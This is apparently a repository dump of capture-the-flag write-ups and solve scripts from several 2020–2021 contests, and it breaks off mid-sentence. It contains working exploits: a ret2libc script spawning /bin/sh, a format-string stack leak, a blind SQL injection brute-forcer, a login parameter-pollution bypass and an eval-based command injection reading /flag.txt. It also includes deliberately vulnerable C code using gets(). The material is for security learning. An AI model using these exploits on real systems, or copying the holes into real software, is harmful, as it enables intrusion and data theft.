-------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/the_journalist.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/the_journalist.gif -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/OSINT/AHF/1.png -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/OSINT/AHF/2.png -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/README.md: -------------------------------------------------------------------------------- 1 | # AHF - OSINT 2 | 3 | Author - [Sanjay Baskaran](http://github.com/sanjaybaskaran01) 4 | 5 | Requirements : Know how to Google 6 | 7 | 8 | --- 9 | When we open the challenge we are greeted with 10 | 11 | >We've been listening and we've heard this group can write decent code (ahem ahem),but what have they been listening to? 12 | 13 | 14 | The [PDF](./team.pdf) included pictures of the team "Atom Heart Father" and their names. 15 | 16 | 17 | We first start up by checking all the user's Spotify (Maybe the flag was in the user's playlist's description) / GitHub (Maybe a project that the team had developed) but that led nowhere. 18 | 19 | Finally trying on Youtube gives us Atom Heart Mother as a suggestion which could be a song that they were listening to. 
20 | 21 |

22 | 1 23 |

24 | 25 | 26 |

27 | 2 28 |

29 | 30 | and finally in the comments of [Pink Floyd - Atom Heart Mother Suite (Full Song)](https://www.youtube.com/watch?v=Fku7hi5kI-c) we have 31 |

32 | flag 33 |

34 | 35 | The flag is 36 | 37 | ``` 38 | dsc{d0nt_m355_w1th_4t0m_h34rt_f4th3r} 39 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/OSINT/AHF/flag.png -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/team.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/OSINT/AHF/team.pdf -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/Dora the Explorer/README.md: -------------------------------------------------------------------------------- 1 | # Dora the explorer - OSINT 2 | 3 | Author - [BlackJack](http://github.com/Mannan-Goyal) 4 | 5 | Requirements : Know how to google, exiftool, XOR 6 | 7 | * * * 8 | 9 | When we start to solve the challenge we are faced with a pretty elaborate hint which says - 10 | 11 | > Hi, I am Dora the Explorer and I love exploring as you know ;) (after all 1+1=0), and I recently found this place which has an a very cool looking street art to it. Plus they posted about it on social media many a times. You all should see this too sometime!!! 12 | 13 | #### Also, we are provided with the following image - 14 | 15 |

Chall Image

16 | 17 | 18 | #### If you carefully look at the picture you'll see this - 19 |

Challenge_Zommed_In

20 | 21 | - After seeing this, my first instinct was to google social street. Among the many results I found this [instagram page](https://www.instagram.com/thesocialstreet_/?hl=en). 22 | 23 | - After scrolling through a bit, I realised that there was no street art or anything related to it, so I searched for social street on instagram search. The first result to come up was [this](https://www.instagram.com/socialstreetcafe/?hl=en). 24 | 25 | - Scrolling a bit led me to this [post](https://www.instagram.com/p/CKGRq81l5bv/). This seemed like street art too. 26 | 27 | - Upon opening this, I found the comment by [@thevisheshbansal](https://www.instagram.com/thevisheshbansal/) saying 28 | 29 | > I know you came a long way to find this. Here is a flag for you: 30 | ``` 31 | j}mu?c:i=}Qf?j=Q:b>zQ}>Ql=Qm:|=h{?s 32 | ``` 33 | 34 | - Well, the challenge is still not over; we need to decrypt the flag. During the ctf I visited [cyberchef](https://gchq.github.io/CyberChef/), put the flag as input and used the `magic mode` with `intensive setting` turned on, because I wanted to finish the chall fast. 35 | 36 | ![Magic_Decode](https://imgur.com/sYAqLzd.png) 37 | 38 | - But from the hint `(1+1=0)` given in the challenge (1 XOR 1 = 0), we could figure out that we might have to use XOR. 39 | 40 | - And in the comment it was mentioned that the key to unlock the flag is the device manufacturer of the image given initially. 41 | 42 | - So running exiftool.... 43 | 44 |

exiftool

45 | 46 | - Hence trying out XOR with key `OnePlus` 47 | ![XOR](https://imgur.com/CjuFOZG.png) 48 | 49 | - So finally the flag is 50 | `dsc{1m4g3s_h1d3_4l0t_s0_b3_c4r3fu1}` 51 | 52 | -------------------------------------------------------------------------------- /Deconstruct.f/README.md: -------------------------------------------------------------------------------- 1 | # Deconstruct.f 2 | 3 | - Official URL: https://ctf.dscvit.com/ 4 | - Format: Jeopardy 5 | - Duration: Fri, 01 Oct. 2021, 13:37 IST — Sat, 02 Oct. 2021, 13:37 IST 6 | -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/Package.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/pwn/Reject humanity return to libc/Package.tar -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/pwn/Reject humanity return to libc/challenge -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/dispenser_login.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void disarm_dispenser(){ 5 | char password[256]; 6 | FILE *password_file; 7 | password_file = fopen("password.txt","r"); 8 | fgets(password,sizeof(*password_file),password_file); 9 | printf("Enter password to disable dispenser:\n"); 10 | char user_input[256]; 11 | gets(user_input); 12 | int eq = strncmp(user_input,password,256); 13 | if (eq != 0) { 14 | printf("Incorrect password\n"); 15 | } 16 | else { 17 | printf("Password 
correct\n"); 18 | printf("Disarming dispenser (or not lol)...\n"); 19 | } 20 | 21 | } 22 | 23 | int main() { 24 | disarm_dispenser(); 25 | } 26 | -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/lib/x86_64-linux-gnu/libc-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/pwn/Reject humanity return to libc/lib/x86_64-linux-gnu/libc-2.31.so -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local = False 4 | 5 | host = 'overly.uniquename.xyz' 6 | port = 2052 7 | 8 | elf = ELF('./challenge') 9 | rop = ROP(elf) 10 | 11 | if local: 12 | p = elf.process() 13 | libc = ELF('/usr/lib/libc.so.6') 14 | else: 15 | p = remote(host, port) 16 | libc = ELF('./lib/x86_64-linux-gnu/libc-2.31.so') 17 | 18 | PUTS_PLT = elf.plt['puts'] 19 | MAIN_PLT = elf.symbols['main'] 20 | 21 | POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0] 22 | RET = rop.find_gadget(['ret'])[0] 23 | 24 | OFFSET = b'A' * (0x210 + 0x8) 25 | 26 | log.info("puts@plt: " + hex(PUTS_PLT)) 27 | log.info("main@plt: " + hex(MAIN_PLT)) 28 | log.info("POP RDI: " + hex(POP_RDI)) 29 | 30 | def get_addr(func_name): 31 | FUNC_GOT = elf.got[func_name] 32 | rop_chain = [ 33 | POP_RDI, FUNC_GOT, 34 | PUTS_PLT, 35 | MAIN_PLT, 36 | ] 37 | 38 | rop_chain = b''.join([p64(i) for i in rop_chain]) 39 | payload = OFFSET + rop_chain 40 | 41 | print(p.recvuntil('Enter password to disable dispenser:\n')) 42 | print(payload) 43 | 44 | p.sendline(payload) 45 | 46 | received = p.recvline().strip() 47 | print(received) 48 | print(p.recvline()) 49 | received = p.recvline().strip() 50 | print(received) 51 | leak = 
u64(received.ljust(8, b'\x00')) 52 | libc.address = leak - libc.symbols[func_name] 53 | 54 | return hex(leak) 55 | x = get_addr('__libc_start_main') 56 | log.info("libcstart main " + x) 57 | log.info('Libc base: ' + hex(libc.address)) 58 | 59 | BIN_SH = next(libc.search(b'/bin/sh')) 60 | SYSTEM = libc.symbols['system'] 61 | EXIT = libc.symbols['exit'] 62 | 63 | ROP_CHAIN = [ 64 | RET, 65 | POP_RDI, BIN_SH, 66 | SYSTEM, 67 | EXIT, 68 | ] 69 | 70 | ROP_CHAIN = b''.join([p64(i) for i in ROP_CHAIN]) 71 | 72 | payload = OFFSET + ROP_CHAIN 73 | 74 | print(p.recvuntil('Enter password to disable dispenser:\n')) 75 | 76 | p.sendline(payload) 77 | 78 | p.interactive() -------------------------------------------------------------------------------- /Deconstruct.f/pwn/destructinator/README.md: -------------------------------------------------------------------------------- 1 | # Destructinator 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Exploit 6 | 7 | In this challenge, there is a format string vulnerability, since the `printf()` function directly accepts user input. The user can enter strings like `%s`, `%x`, `%p`, to leak items from the stack. 8 | 9 | The password was stored as a local variable in the function, therefore it must be present on the stack. We run the following script to leak the stack. 
10 | 11 | ```py 12 | from pwn import * 13 | host = 'overly.uniquename.xyz' 14 | port = 8880 15 | 16 | stack = [] 17 | 18 | for i in range(1, 100): 19 | try: 20 | p = remote(host, port) 21 | print(p.recv(1024)) 22 | p.sendline('%{}$s'.format(i)) 23 | print(p.recvline()) 24 | y = p.recvline() 25 | 26 | stack.append(y) 27 | print(y) 28 | print(stack) 29 | except: 30 | pass 31 | ``` 32 | 33 | This gives an output like the following 34 | 35 | ```py 36 | [b'(null)\n', b'\xd6.y\xe4\xfd\x7f\n', b'(null)\n', b'I\x89\xc0H\x85\xc0\x0f\x84\xc2\n', b'%11$s\n', b'1_l0v3_c4ts\n', b'H\x8d\x05\x88\xf4\x02\n', b'(null)\n', b'I\x83\xc5\x02A\x0f\xb7m\xfeI\x89\xc6L\x8dx\xfeM\x85\xe4u\x13\xeb\xcc\x0f\x1f@\n', b'(null)\n', b'\n', b'(null)\n', b'1_l0v3_c4ts\n', b'\n', b'\x85\xc0y\xe5H\xc7\xc0\xc0\xff\xff\xffH\x8bs\x08H\x8d\rb\xcf\x02\n'...] 37 | ``` 38 | 39 | We can see the string `1_l0v3_c4ts` in the array above, which is actually the password for the challenge. Entering this returns the flag: 40 | 41 | ``` 42 | dsc{7h3_p20ff3502_7h4nk5_y0u} 43 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/web/Curly Fries 1/README.md: -------------------------------------------------------------------------------- 1 | # Curly Fries 1 - Web 2 | 3 | Author - [UnknownAbyss](https://github.com/UnknownAbyss) 4 | 5 | Requirements : cURL 6 | 7 | * * * 8 | 9 | The challenge gives us the following text - 10 | 11 | > Normal fries are nice, but everything's better with a curl in it. The flag is right in front of you. 12 | 13 | 14 | ``` 15 | very.uniquename.xyz:8880 16 | ``` 17 | 18 | #### Upon opening the link we see - 19 | 20 |

Chall Image

21 | 22 | This screams Sweden. So we try to set the language header to Swedish 23 | 24 | ```sh 25 | curl -H "Accept-Language: sv-SE" very.uniquename.xyz:8880 26 | ``` 27 | 28 | This gives us the flag... 29 | ``` 30 | dsc{1_l0v3_sw3d3n} 31 | ``` 32 | -------------------------------------------------------------------------------- /Deconstruct.f/web/Curly Fries 2/README.md: -------------------------------------------------------------------------------- 1 | # Curly Fries 2 - Web 2 | 3 | Author - [UnknownAbyss](https://github.com/UnknownAbyss) 4 | 5 | Requirements : cURL 6 | 7 | * * * 8 | 9 | The challenge gives us the following text - 10 | 11 | > Normal fries are nice, but everything's better with a curl in it. Why do logos make things so recognizable? 12 | 13 | 14 | ``` 15 | very.uniquename.xyz:2052 16 | ``` 17 | 18 | #### Upon opening the link we see - 19 | 20 | 

Chall Image

21 | 22 | We see the logos of Xbox and Linux on the screen. This is me accessing the page from a Windows device. 23 | 24 | Setting the User-Agent to Linux... 25 | 26 | ```sh 27 | curl -H "User-Agent: Linux" very.uniquename.xyz:2052 28 | ``` 29 | 30 | ...we get this back 31 | 32 | ```html 33 | ... 34 | 35 | 
Xbox
36 | 37 | ... 38 | ``` 39 | 40 | We see the linux logo is gone. Hence we put user agent as both Linux and Xbox 41 | 42 | ```sh 43 | curl -H "User-Agent: Linux Xbox" very.uniquename.xyz:2052 44 | ``` 45 | 46 | This gives us the flag inside the body of the page... 47 | ``` 48 | dsc{1m4g1n3_l1nux_0n_4n_xb0x} 49 | ``` 50 | -------------------------------------------------------------------------------- /Deconstruct.f/web/Hungry Man/README.md: -------------------------------------------------------------------------------- 1 | # Hungry Man - Web 2 | 3 | Author - [UnknownAbyss](https://github.com/UnknownAbyss) 4 | 5 | Requirements : Python, cURL 6 | 7 | * * * 8 | 9 | The challenge gives us the following text - 10 | 11 | > There is nothing here I promise! ;) 12 | 13 | 14 | ``` 15 | very.uniquename.xyz:2095 16 | ``` 17 | 18 | #### Upon opening the link we see - 19 | 20 |

Chall Image

21 | 22 | 23 | Checking the network tab, we find the following response header 24 | 25 |

Chall Image

26 | 27 | We send the following curl request, setting the cookie to the given string 28 | 29 | ```sh 30 | curl -H "Cookie: flag=c29tZXRpbWVzIHRoZSBrZXkgdG8gdW5sb2NraW5nIHRoZSBhbnN3ZXIgaXMgdGhlIHF1ZXN0aW9uIGl0c2VsZi4uLiBidXQgbXkgZmF2b3JpdGUgaXMgY2hvY28gY2hpcA==" very.uniquename.xyz:2095 31 | ``` 32 | 33 | The response is... 34 | 35 | ``` 36 | {"flag":"522748524ad010358705b6852b81be4c"} 37 | ``` 38 | 39 | Then sending this new cookie... 40 | 41 | ```sh 42 | curl -H "Cookie: flag=522748524ad010358705b6852b81be4c" very.uniquename.xyz:2095 43 | ``` 44 | 45 | The response is... 46 | 47 | ``` 48 | {"flag":"70e9490b5d5a217070c1e7df9518e9d5"} 49 | ``` 50 | 51 | Let us write a script for this... 52 | 53 | ```py 54 | import requests 55 | 56 | 57 | url = 'http://very.uniquename.xyz:2095' 58 | flags = ['c29tZXRpbWVzIHRoZSBrZXkgdG8gdW5sb2NraW5nIHRoZSBhbnN3ZXIgaXMgdGhlIHF1ZXN0aW9uIGl0c2VsZi4uLiBidXQgbXkgZmF2b3JpdGUgaXMgY2hvY28gY2hpcA=='] 59 | 60 | 61 | while (flags[-1]!='EOF'): 62 | x = requests.get(url, cookies={'flag': flags[-1]}).text 63 | flags.append(x[9:-3 ]) 64 | 65 | for i in flags[1:-1]: 66 | print(i) 67 | ``` 68 | 69 | This gives us the following output 70 | 71 | ``` 72 | 522748524ad010358705b6852b81be4c 73 | 70e9490b5d5a217070c1e7df9518e9d5 74 | 60173ca988f93d0a7da64f3327ad336c 75 | 45ec864b6976a208c6af1a37e2c61c3a 76 | 046bf0a7d0d641c527765a02816eca9f 77 | 24cafc74b88dfafb0524ecc85a76f8bd 78 | f3ea97d2cd1f5619f570c06a10a041b5 79 | fa4f4d80f554c6845daf73511d75e6bc 80 | 72e6f6e0f08ca88f02b1480464afd55b 81 | 97d243cd9c2513d20fff6d5677b2b62b 82 | ffc987113c7a22fb2a52b6f9842f79be 83 | a61c8204ca3eb98c9da7344cf0fba066 84 | 9bea76c2f9cb9140f837ee4518b6749c 85 | ``` 86 | 87 | These appear to be MD5 hashes. Reversing each one (each is the hash of a short string) gives the following pieces 88 | 89 | ``` 90 | ds 91 | c{ 92 | 91v 93 | 3_m 94 | 3_4 95 | _h 96 | 4n 97 | dfu 98 | 1_0 99 | f_ 100 | c00 101 | k13 102 | 5} 103 | ``` 104 | 105 | Joined together, this is the flag... 
106 | ``` 107 | dsc{91v3_m3_4_h4ndfu1_0f_c00k135} 108 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/web/Hungry Man/hungry.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | url = 'http://very.uniquename.xyz:2095' 5 | flags = ['c29tZXRpbWVzIHRoZSBrZXkgdG8gdW5sb2NraW5nIHRoZSBhbnN3ZXIgaXMgdGhlIHF1ZXN0aW9uIGl0c2VsZi4uLiBidXQgbXkgZmF2b3JpdGUgaXMgY2hvY28gY2hpcA=='] 6 | 7 | 8 | while (flags[-1]!='EOF'): 9 | x = requests.get(url, cookies={'flag': flags[-1]}).text 10 | flags.append(x[9:-3 ]) 11 | 12 | for i in flags[1:-1]: 13 | print(i) -------------------------------------------------------------------------------- /Deconstruct.f/web/gate keeper/README.md: -------------------------------------------------------------------------------- 1 | # Gate Keeper 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Exploit 6 | 7 | SQL Injection. This also works for the [Taxi Union](../taxi%20union) challenge. 
8 | 9 | ```py 10 | import requests 11 | import string 12 | 13 | flag = '' 14 | 15 | print(flag) 16 | 17 | domain = string.ascii_lowercase + string.ascii_uppercase + string.digits + '_}' 18 | 19 | f = 0 20 | 21 | challenge = "gate keeper" 22 | url = "" 23 | check = "" 24 | key = "" 25 | column = "" 26 | if challenge == "taxi union": 27 | url = 'http://extremely.uniquename.xyz:2052/' 28 | check = "TN-06-AP-9879" 29 | key = 'lisence_plate' 30 | column = "location" 31 | elif challenge == 'gate keeper': 32 | url = 'http://extremely.uniquename.xyz:2082/' 33 | check = "The flag for the CTF is the password you entered.(If you havent cheated that is)" 34 | key = 'password' 35 | column = "password" 36 | 37 | print("URL", url) 38 | 39 | while True: 40 | for char in domain: 41 | payload = "' or {} like '{}%'; --".format(column, flag + char) 42 | print(payload) 43 | 44 | r = requests.post(url, data={key: payload}) 45 | 46 | if (check in r.text): 47 | flag = flag + char 48 | print("Success " + flag) 49 | 50 | break 51 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/web/taxi union/README.md: -------------------------------------------------------------------------------- 1 | # Taxi Union 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Exploit 6 | 7 | SQL Injection. This solution also works for the [Gate Keeper](../gate%20keeper) challenge. 
8 | 9 | ```py 10 | import requests 11 | import string 12 | 13 | flag = '' 14 | 15 | print(flag) 16 | 17 | domain = string.ascii_lowercase + string.ascii_uppercase + string.digits + '_}' 18 | 19 | f = 0 20 | 21 | challenge = "gate keeper" 22 | url = "" 23 | check = "" 24 | key = "" 25 | column = "" 26 | if challenge == "taxi union": 27 | url = 'http://extremely.uniquename.xyz:2052/' 28 | check = "TN-06-AP-9879" 29 | key = 'lisence_plate' 30 | column = "location" 31 | elif challenge == 'gate keeper': 32 | url = 'http://extremely.uniquename.xyz:2082/' 33 | check = "The flag for the CTF is the password you entered.(If you havent cheated that is)" 34 | key = 'password' 35 | column = "password" 36 | 37 | print("URL", url) 38 | 39 | while True: 40 | for char in domain: 41 | payload = "' or {} like '{}%'; --".format(column, flag + char) 42 | print(payload) 43 | 44 | r = requests.post(url, data={key: payload}) 45 | 46 | if (check in r.text): 47 | flag = flag + char 48 | print("Success " + flag) 49 | 50 | break 51 | ``` -------------------------------------------------------------------------------- /Fword CTF/Miscellaneous/Secret Array/README.md: -------------------------------------------------------------------------------- 1 | # Secret Array 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [namsnath](https://github.com/namsnath) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | - nc secretarray.fword.wtf 1337 12 | 13 | # Exploitation 14 | 15 | We can get the sum of 2 numbers, 1337 times. We can send out 3 queries and find out 3 values. 16 | 17 | ``` 18 | 1 2 19 | 1 3 20 | 2 3 21 | ``` 22 | 23 | From here we can get the individual values of a[1], a[2], and a[3]. 
24 | 25 | 26 | ```py 27 | from pwn import remote 28 | 29 | r = remote('secretarray.fword.wtf', 1337) 30 | 31 | x = r.recvuntil('START:\n').decode() 32 | print(x) 33 | 34 | arr = [] 35 | 36 | for k in range(0, 1335, 3): 37 | x = f'{k} {k+1}' 38 | print(x) 39 | x = r.sendline(x) 40 | a = int(r.recvline().decode()) 41 | print(a) 42 | 43 | x = f'{k+1} {k+2}' 44 | print(x) 45 | x = r.sendline(x) 46 | b = int(r.recvline().decode()) 47 | print(b) 48 | 49 | x = f'{k} {k+2}' 50 | print(x) 51 | x = r.sendline(x) 52 | c = int(r.recvline().decode()) 53 | print(c) 54 | 55 | first = (a - b + c)//2 56 | second = a - first 57 | third = b - second 58 | 59 | arr.append(first) 60 | arr.append(second) 61 | arr.append(third) 62 | 63 | x = f'{1334} {1335}' 64 | r.sendline(x) 65 | x = int(r.recvline().decode()) 66 | first = x - arr[1334] 67 | arr.append(first) 68 | 69 | x = f'{1334} {1336}' 70 | r.sendline(x) 71 | x = int(r.recvline().decode()) 72 | first = x - arr[1334] 73 | arr.append(first) 74 | 75 | print(arr) 76 | 77 | r.sendline('DONE {}'.format(' '.join(map(str, arr)))) 78 | x = r.recvline().decode() 79 | 80 | print(x) 81 | ``` 82 | 83 | The flag is: 84 | 85 | ``` 86 | FwordCTF{R4nd0m_isnT_R4nd0m_4ft3r_4LL_!_Everyhthing_is_predict4bl3_1f_y0u_kn0w_wh4t_Y0u_d01nGGGG} 87 | ``` -------------------------------------------------------------------------------- /Fword CTF/README.md: -------------------------------------------------------------------------------- 1 | # Fword CTF 2 | 3 | - Official URL: https://ctf.fword.wtf/ 4 | - Format: Jeopardy 5 | - Duration: Sat, 29 Aug. 2020, 22:30 IST — Sun, 30 Aug. 2020, 22:30 IST 6 | -------------------------------------------------------------------------------- /Google CTF/README.md: -------------------------------------------------------------------------------- 1 | # Google Capture the Flag 2020 2 | 3 | - Official URL: https://g.co/ctf 4 | - Format: Jeopardy 5 | - Duration: Sat, 22 Aug. 2020, 05:30 IST — Mon, 24 Aug. 
2020, 05:29 IST -------------------------------------------------------------------------------- /Google CTF/Web/Log-Me-In/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | url = lambda path: 'https://log-me-in.web.ctfcompetition.com' + path 5 | 6 | s = requests.Session() 7 | 8 | payload = { 9 | "username": "michelle", 10 | "password[username]": "michelle", 11 | "csrf": "", 12 | } 13 | 14 | r = s.post(url('/login'), data=payload) 15 | 16 | r = s.get(url('/flag')) 17 | 18 | if re.search(r'CTF{.*}', r.text): 19 | print(r.text) 20 | -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/boredom: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HSCTF 7/Binary Exploitation/boredom/boredom -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/boredom.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | void setup() { 9 | puts("I'm currently bored out of my mind. Give me something to do!"); 10 | setvbuf(stdin, NULL, _IONBF, NULL); 11 | setvbuf(stdout, NULL, _IONBF, NULL); 12 | } 13 | 14 | void flag() { 15 | FILE *f = fopen("flag.txt", "r"); 16 | char buf[50]; 17 | if (f == NULL) { 18 | puts("You're running this locally or I can't access the flag file for some reason."); 19 | puts("If this occurs on the remote, ping @PMP#5728 on discord server."); 20 | exit(1); 21 | } 22 | fgets(buf, 50, f); 23 | printf("Hey, that's a neat idea. 
Here's a flag for your trouble: %s\n", 24 | buf); 25 | puts("Now go away."); 26 | exit(42); 27 | } 28 | 29 | int main() { 30 | char toDo[200]; 31 | setup(); 32 | 33 | printf("Give me something to do: "); 34 | gets(toDo); 35 | puts("Ehhhhh, maybe later."); 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HSCTF 7/Binary Exploitation/boredom/static/img1.png -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/static/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HSCTF 7/Binary Exploitation/boredom/static/img2.png -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/static/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HSCTF 7/Binary Exploitation/boredom/static/img3.png -------------------------------------------------------------------------------- /HSCTF 7/Miscellaneous/My First Calculator/README.md: -------------------------------------------------------------------------------- 1 | # My First Calculator 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Exploit a python 2 vulnerability. 6 | 7 | # Requirements 8 | 9 | - Python 2 10 | 11 | # Source 12 | 13 | - [calculator.py](./calculator.py) 14 | 15 | ``` 16 | I'm really new to python. Please don't break my calculator! 17 | 18 | nc misc.hsctf.com 7001 19 | 20 | There is a flag.txt on the server. 
21 | 22 | Author: meow 23 | ``` 24 | 25 | ```python 26 | #!/usr/bin/env python2.7 27 | 28 | try: 29 | print("Welcome to my calculator!") 30 | print("You can add, subtract, multiply and divide some numbers") 31 | 32 | print("") 33 | 34 | first = int(input("First number: ")) 35 | second = int(input("Second number: ")) 36 | 37 | operation = str(raw_input("Operation (+ - * /): ")) 38 | 39 | if first != 1 or second != 1: 40 | print("") 41 | print("Sorry, only the number 1 is supported") 42 | 43 | if first == 1 and second == 1 and operation == "+": 44 | print("1 + 1 = 2") 45 | if first == 1 and second == 1 and operation == "-": 46 | print("1 - 1 = 0") 47 | if first == 1 and second == 1 and operation == "*": 48 | print("1 * 1 = 1") 49 | if first == 1 and second == 1 and operation == "/": 50 | print("1 / 1 = 1") 51 | else: 52 | print(first + second) 53 | except ValueError: 54 | pass 55 | 56 | ``` 57 | 58 | # Exploitation 59 | 60 | The code for the `calculator.py` file uses `input()` in Python 2. The `input()` function in Python 2 is vulnerable because it evaluates whatever is typed as a Python expression (it behaves like `eval(raw_input())`) instead of returning it as a string. For example, if you were to pass `__import__('os')`, it would be executed. In Python 3, `input()` returns a plain string, which is what the flag hints at. So, here's the payload: 61 | 62 | ```bash 63 | Welcome to my calculator! 64 | You can add, subtract, multiply and divide some numbers 65 | 66 | First number: __import__('os').system('cat /flag.txt') 67 | flag{please_use_python3} 68 | ``` 69 | 70 | You can search around in the directories to find the flag using `ls`, etc. The flag is eventually found in the `/` directory. 
The flag is: 71 | 72 | ``` 73 | flag{please_use_python3} 74 | ``` -------------------------------------------------------------------------------- /HSCTF 7/Miscellaneous/My First Calculator/calculator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | 3 | try: 4 | print("Welcome to my calculator!") 5 | print("You can add, subtract, multiply and divide some numbers") 6 | 7 | print("") 8 | 9 | first = int(input("First number: ")) 10 | second = int(input("Second number: ")) 11 | 12 | operation = str(raw_input("Operation (+ - * /): ")) 13 | 14 | if first != 1 or second != 1: 15 | print("") 16 | print("Sorry, only the number 1 is supported") 17 | 18 | if first == 1 and second == 1 and operation == "+": 19 | print("1 + 1 = 2") 20 | if first == 1 and second == 1 and operation == "-": 21 | print("1 - 1 = 0") 22 | if first == 1 and second == 1 and operation == "*": 23 | print("1 * 1 = 1") 24 | if first == 1 and second == 1 and operation == "/": 25 | print("1 / 1 = 1") 26 | else: 27 | print(first + second) 28 | except ValueError: 29 | pass 30 | -------------------------------------------------------------------------------- /HSCTF 7/README.md: -------------------------------------------------------------------------------- 1 | # HSCTF 7 2 | 3 | - Official URL: https://ctf.hsctf.com/ 4 | - Format: Jeopardy 5 | - Duration: Mon, 01 June 2020, 17:30 IST — Sat, 06 June 2020, 05:30 IST 6 | -------------------------------------------------------------------------------- /HacktivityCon CTF/Cryptography/Tyrannosaurus Rex/README.md: -------------------------------------------------------------------------------- 1 | # Tyrannosaurus Rex 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ```python 12 | #!/usr/bin/env python 13 | 14 | import base64 15 | import binascii 16 | 17 | h = binascii.hexlify 18 | b = base64.b64encode 19 | 20 | c = 
b'37151032694744553d12220a0f584315517477520e2b3c226b5b1e150f5549120e5540230202360f0d20220a376c0067' 21 | 22 | def enc(f): 23 | e = b(f) 24 | 25 | print(e) 26 | z = [] 27 | i = 0 28 | while i < len(e): 29 | z += [ e[i] ^ e[((i + 1) % len(e))]] 30 | i = i + 1 31 | print(z) 32 | print(bytearray(z)) 33 | c = h(bytearray(z)) 34 | return c 35 | ``` 36 | 37 | ``` 38 | We found this fossil. Can you reverse time and bring this back to life? 39 | ``` 40 | 41 | # Exploitation 42 | 43 | In this challenge, you have to reverse the steps to get back the original flag from the ciphertext `c`. Make a function `dec(x)` which takes in the ciphertexts and spits out the original text. 44 | 45 | ```python 46 | #!/usr/bin/env python 47 | 48 | import base64 49 | import binascii 50 | 51 | h = binascii.hexlify 52 | b = base64.b64encode 53 | 54 | c = b'37151032694744553d12220a0f584315517477520e2b3c226b5b1e150f5549120e5540230202360f0d20220a376c0067' 55 | 56 | def enc(f): 57 | e = b(f) 58 | 59 | print(e) 60 | z = [] 61 | i = 0 62 | while i < len(e): 63 | z += [ e[i] ^ e[((i + 1) % len(e))]] 64 | i = i + 1 65 | print(z) 66 | print(bytearray(z)) 67 | c = h(bytearray(z)) 68 | return c 69 | 70 | def dec(x): 71 | x = list(bytes.fromhex(x.decode())) 72 | z = ord('Z') 73 | for i in range(len(x)): 74 | print(chr(z), end='') 75 | z = x[i] ^ z 76 | dec(c) 77 | ``` 78 | 79 | Now, just run this with python, and pipe the output to `base64 